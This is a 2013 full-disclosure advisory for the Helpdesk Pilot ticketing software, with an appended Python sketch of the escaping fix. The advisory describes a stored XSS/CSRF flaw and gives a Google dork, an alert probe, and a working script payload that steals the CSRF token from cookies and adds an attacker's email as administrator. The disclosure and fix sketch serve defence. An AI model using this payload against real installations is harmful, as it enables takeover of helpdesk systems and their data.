Message-ID: <CABFLu95L3kChENWZxo5M6_mW=A1bb5qk+XVrOVm-=5XE1U2MDw@mail.gmail.com>
Date: Mon, 2 Dec 2013 12:32:11 +0000
From: Ciaran McNally <ciaran.mcnally3@...l.dcu.ie>
To: full-disclosure@...ts.grok.org.uk
Subject: (no subject)

###########################################################

                             Ciaran McNally

Application:     Helpdesk Pilot
                 http://www.helpdeskpilot.com/
Versions:        All versions.
Platforms:       Windows, Mac, Linux
Bug:             XSS/CSRF Add Administrator
Exploitation:    WEB
Date:            30 November 2013.
Author:          Ciaran McNally
Web:             http://makthepla.net/blog/=/helpdesk-pilot-add-admin
My Twitter: https://twitter.com/ciaranmak
Google Dork: intext:"powered by Helpdesk Pilot"

#######################################################################

1) Bug.
2) The exploit.
3) Fix.

###########################################################
Help desk software or your business...
###########################################################

======
1) Bug
======
If an attacker can submit a ticket, he/she simply needs to include a malicious
URL within the ticket.

JavaScript injection then occurs via the URL, which is incorrectly sanitized.

http://example.com/<script>prompt(1);</script>



###########################################################

===============
2) The "exploit"
===============

For a simple proof of concept, use the example above; you will see the
expected popup within the ticketing system once it's viewed.

To add an administrator, use a malicious URL similar to the following...
(Make sure there are no spaces, otherwise it won't be parsed correctly)

http://makthepla.net/
<script>$(document).ready(function(){$.ajax({type:"POST",url:"http://
[HOST]/staff/manage/staff/",data:"csrfmiddlewaretoken="+document.cookie.split('=')[1]+"&formtype=invite_staff&staff&first_name&last_name&email=[ATTACKER_MAIL]&bulk_emails&role=1&categories=1",success:function(data){alert("Admin-Added-POC");},error:function(data){alert("POC_FAILED");}})});</script>

where [HOST] is the location of the software
and [ATTACKER_MAIL] is the attacker's email.

The attacker will receive a mail if it successfully executes, to complete
the admin addition.

The example above contains alerts simply for POC; this is the one used
in the video on my blog post.



#######################################################################

======
3) Fix
======

Was reported to the vendors twice.

Fix in progress...

#######################################################################

--
maK :)

-- 
-------------------------------------------
*-maK-*
Redbrick Administrator 2013/2014
Redbrick Webmaster 2012/2013
Redbrick Events Officer 2011/2012
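
Added example, not part of the original advisory and not the vendor's code: a Python sketch of the flaw from section 1 (a URL in a ticket rendered as HTML without output escaping) beside an escaped version. It assumes the ticket view auto-links URLs; the function names, the regex and the sample ticket text are constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Matches a URL token up to the next whitespace, as a simple auto-linker would.
URL_RE = re.compile(r"https?://\S+")

def linkify_unsafe(text):
    """Vulnerable pattern: the matched URL is pasted into the HTML unescaped."""
    return URL_RE.sub(
        lambda m: '<a href="%s">%s</a>' % (m.group(0), m.group(0)), text)

def linkify_safe(text):
    """Escape all ticket text; only well-formed http(s) URLs become links."""
    out, pos = [], 0
    for m in URL_RE.finditer(text):
        # Text between URLs is untrusted too, so it is escaped as well.
        out.append(html.escape(text[pos:m.start()]))
        url = m.group(0)
        esc = html.escape(url, quote=True)  # also escapes " and '
        try:
            parts = urlsplit(url)
            ok = parts.scheme in ("http", "https") and bool(parts.netloc)
        except ValueError:  # malformed authority, e.g. an unbalanced "["
            ok = False
        if ok:
            out.append('<a href="%s" rel="noopener noreferrer">%s</a>'
                       % (esc, esc))
        else:
            out.append(esc)  # shown as plain text, never as markup
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)

# Constructed ticket body using the harmless probe quoted in section 1.
TICKET = "Please see http://example.com/<script>prompt(1);</script> thanks"

if __name__ == "__main__":
    print("unsafe:", linkify_unsafe(TICKET))
    print("safe:  ", linkify_safe(TICKET))
```

Escaping at output time is the primary fix; since the script in section 2 takes the CSRF token from document.cookie, token-based CSRF protection alone does not stop a request made by injected script.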
